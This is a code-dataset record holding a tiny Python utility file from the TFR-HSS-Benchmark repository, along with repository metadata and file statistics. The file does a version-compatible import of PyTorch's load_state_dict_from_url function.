797c55f617cfad4667d533c21de754ba3cd474f5
| 177
|
py
|
Python
|
src/utils/vgg_utils.py
|
shendu-sw/TFR-HSS-Benchmark
|
3fbc93ff548d924050e2de5070007197f04be7f4
|
[
"MIT"
] | 7
|
2021-08-24T10:01:28.000Z
|
2021-12-29T07:13:17.000Z
|
src/utils/vgg_utils.py
|
idrl-lab/TFR-HSS-Benchmark
|
3fbc93ff548d924050e2de5070007197f04be7f4
|
[
"MIT"
] | null | null | null |
src/utils/vgg_utils.py
|
idrl-lab/TFR-HSS-Benchmark
|
3fbc93ff548d924050e2de5070007197f04be7f4
|
[
"MIT"
] | 1
|
2021-08-25T01:38:39.000Z
|
2021-08-25T01:38:39.000Z
|
# -*- encoding: utf-8 -*-
try:
from torch.hub import load_state_dict_from_url
except ImportError:
from torch.utils.model_zoo import load_url as load_state_dict_from_url
| 29.5
| 74
| 0.774011
| 29
| 177
| 4.37931
| 0.62069
| 0.141732
| 0.204724
| 0.267717
| 0.314961
| 0
| 0
| 0
| 0
| 0
| 0
| 0.006623
| 0.146893
| 177
| 5
| 75
| 35.4
| 0.834437
| 0.129944
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.75
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.